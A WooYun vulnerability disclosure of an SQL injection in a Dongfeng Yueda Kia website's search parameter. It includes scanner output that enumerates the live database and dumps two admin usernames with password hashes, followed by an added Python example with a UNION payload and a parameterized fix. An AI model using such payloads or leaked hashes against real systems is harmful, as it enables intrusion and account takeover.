
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-081552

Title: SQL injection on a Dongfeng Yueda Kia (东风悦达起亚) site

Vendor: dyk.com.cn

Author: CtrlH

Submitted: 2014-11-03 11:13

Fixed: 2014-12-18 11:16

Published: 2014-12-18 11:16

Type: SQL injection

Severity: Medium

Self-assessed rank: 10

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-11-03: Details sent to the vendor, awaiting vendor handling
2014-11-07: Vendor confirmed; details disclosed to the vendor only
2014-11-17: Details disclosed to core white hats and domain experts
2014-11-27: Details disclosed to regular white hats
2014-12-07: Details disclosed to intern white hats
2014-12-18: Details disclosed to the public

Brief description:

At a fire-safety lecture at work today, a man from the fire brigade told us that a few days ago, at a fire they were putting out, a woman came running out at the last moment clutching a computer.
The firefighter was furious and asked her: do you not want to live? Which matters more, money or your life? If you're dead, what use is the computer?
The woman, aggrieved, said she was the company's accountant and the computer held a lot of important data.
The firefighter got even more worked up: for crying out loud, have some common sense! If the data is important you grab the tower; why the hell did you grab the monitor!

Detailed description:

(screenshot: 1.png)

URL:http://www.dyk.com.cn/search?q=K3&t=1 q=K3
Analyzing http://www.dyk.com.cn/search?q=K3&t=1 q=K3 with 2 input parameter(s)
Test parameter: t
Host IP: 219.145.171.61
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.3.27
Keyword Found: 2014-10-31
Injection type is String (')
DB Server: MySQL >=5
Trying another method using keyword for finding columns count
Findig columns count for MySQL failed!
Current DB: dyk_dyk
MySQL error based injection method can be used!
Count(table_name) of information_schema.tables where table_schema=0x64796B5F64796B is 32
Can not get all tables by group_concat!
Count(table_name) of information_schema.tables where table_schema=0x64796B5F64796B is 32
Bypassing illegal union failed! Turning off this feature
Table found: ci_addonarticle
Table found: ci_admin_node
Table found: ci_admin_role
Table found: ci_captcha
Table found: ci_admin
Table found: ci_arcatt
Table found: ci_arctype
Table found: ci_attachment
Table found: ci_arctiny
Table found: ci_archives
Table found: ci_cartype
Table found: ci_citys
Table found: ci_common_cache
Table found: ci_channeltype
Table found: ci_member
Table found: ci_login_log
Table found: ci_log
Table found: ci_member_car
Table found: ci_member_qq
Table found: ci_member_msg
Table found: ci_search_keyword
Table found: ci_provinces
Table found: ci_search
Table found: ci_menu
Table found: ci_sendmsg_log
Table found: ci_sessions
Table found: ci_stepselect
Table found: ci_sys_enum
Table found: ci_serviceplan
Table found: ci_member_sinaweibo
Table found: ci_sysconfig
Table found: ci_table
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F6D656D6265725F73696E61776569626F is 8
Column found: id
Column found: updatetime
Column found: sina_id
Column found: name
Column found: addtime
Column found: headimg
Column found: uid
Column found: status
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F6164646F6E61727469636C65 is 3
Column found: aid
Column found: userip
Column found: body
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F61646D696E5F6E6F6465 is 8
Column found: id
Column found: reid
Column found: typeid
Column found: code
Column found: sort
Column found: is_check
Column found: description
Column found: name
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F61646D696E5F726F6C65 is 7
Column found: id
Column found: description
Column found: menuids
Column found: sort
Column found: name
Column found: nodeids
Column found: is_check
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F63617074636861 is 4
Column found: captcha_id
Column found: captcha_time
Column found: ip_address
Column found: word
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F61646D696E is 21
Column found: id
Column found: realname
Column found: email
Column found: msn
Column found: group_id
Column found: phone
Column found: qq
Column found: posts
Column found: mobile
Column found: name
Column found: pass
Column found: birthday
Column found: loginCount
Column found: createTime
Column found: question
Column found: lastLoginTime
Column found: cardid
Column found: lastLoginIp
Column found: modifyTime
Column found: answer
Column found: state
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F617263617474 is 3
Column found: sortid
Column found: att
Column found: attname
Count(*) of dyk_dyk.ci_admin is 2
Data Found: name,pass=admin^fd6ae85c115d21c784ac7f3a3d9606a9
Data Found: name,pass=dyk_admin^9c3782798090e60c81e5c5cc25c7225c

Proof of vulnerability (the same scanner output as in the detailed description above, screenshot 1.png):


Fix recommendation:

Copyright notice: when reposting, credit the source CtrlH@乌云
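
The fix section of the original report is empty. The following is an added example, not code from the report or from the dyk.com.cn application (which the scanner log shows runs PHP; Python with an in-memory SQLite database is used here so the example runs stand-alone, standing in for MySQL). It shows the query shape the log implies for the `t` parameter ("Injection type is String (')"), a UNION payload that turns the search into a dump of `ci_admin`, the parameterized version of the same query that defeats it, and a decoder for the `0x...` hex literals the scanner used for `table_schema` and `table_name`. The table layouts, sample rows and placeholder digests are constructed for the example; only the table names and the `ci_admin` columns `name` and `pass` come from the report.

```python
import sqlite3

# Constructed sample data (not taken from the report): two admin rows shaped
# like the "name,pass" dump above, with placeholder digests, and three archive
# rows that a search for q=K3 could hit. The ci_archives columns are assumed.
SAMPLE_ADMINS = [("admin", "0" * 32), ("dyk_admin", "1" * 32)]
SAMPLE_ARCHIVES = [
    (1, "K3 sedan", "1", "2014-10-31"),
    (2, "K5 sedan", "2", "2014-10-31"),
    (3, "K3 hatchback", "2", "2014-10-30"),
]


def build_db():
    """In-memory SQLite stand-in for the MySQL schema dyk_dyk."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE ci_admin (id INTEGER PRIMARY KEY, name TEXT, pass TEXT)"
    )
    conn.execute(
        "CREATE TABLE ci_archives (id INTEGER PRIMARY KEY, title TEXT, "
        "typeid TEXT, pubdate TEXT)"
    )
    conn.executemany("INSERT INTO ci_admin (name, pass) VALUES (?, ?)", SAMPLE_ADMINS)
    conn.executemany("INSERT INTO ci_archives VALUES (?, ?, ?, ?)", SAMPLE_ARCHIVES)
    return conn


def search_vulnerable(conn, q, t):
    """/search?q=...&t=... as the scanner found it: `t` is wrapped in quotes
    but spliced into the SQL text, so a quote inside `t` ends the literal and
    whatever follows is parsed as SQL."""
    sql = (
        "SELECT title, pubdate FROM ci_archives "
        "WHERE title LIKE '%" + q + "%' AND typeid = '" + t + "'"
    )
    return conn.execute(sql).fetchall()


def search_fixed(conn, q, t):
    """Same query with bound parameters: the driver passes q and t as values,
    so nothing inside `t` can change the statement's structure."""
    sql = "SELECT title, pubdate FROM ci_archives WHERE title LIKE ? AND typeid = ?"
    return conn.execute(sql, ("%" + q + "%", t)).fetchall()


# A UNION payload for `t`: closes the string literal, appends a SELECT with the
# same column count over ci_admin, and comments out the dangling quote. The
# report's tool fell back to MySQL error-based extraction after its UNION
# attempts failed; the flaw it exploited is the same unescaped literal.
PAYLOAD = "1' UNION SELECT name, pass FROM ci_admin -- "


def decode_hex_literal(literal):
    """Decode a MySQL 0x... string literal. The scanner encodes names this way
    (table_schema=0x64796B5F64796B) so the injected query needs no quote
    characters beyond the one that opened the injection."""
    return bytes.fromhex(literal[2:]).decode("utf-8")


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable:", search_vulnerable(conn, "K3", PAYLOAD))
    print("fixed:     ", search_fixed(conn, "K3", PAYLOAD))
    print("normal:    ", search_fixed(conn, "K3", "1"))
    print(decode_hex_literal("0x64796B5F64796B"), decode_hex_literal("0x63695F61646D696E"))
```

Two points beyond binding the parameters. In the original URL `t` is a numeric type id (`t=1`), so rejecting anything that is not a small integer before the query is a cheap second layer. And the two `pass` values the scanner dumped are 32-hex-character digests, the length of an MD5 hash; if that is what they are, they are unsalted and crackable offline, so rotating both admin passwords and moving to a salted, slow password hash belongs in the fix alongside the query change.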


Vendor response

Vendor reply:

Severity: Medium

Rank: 10

Confirmed: 2014-11-07 17:59

Vendor comment:

Fixed, thanks.

Latest status:

None yet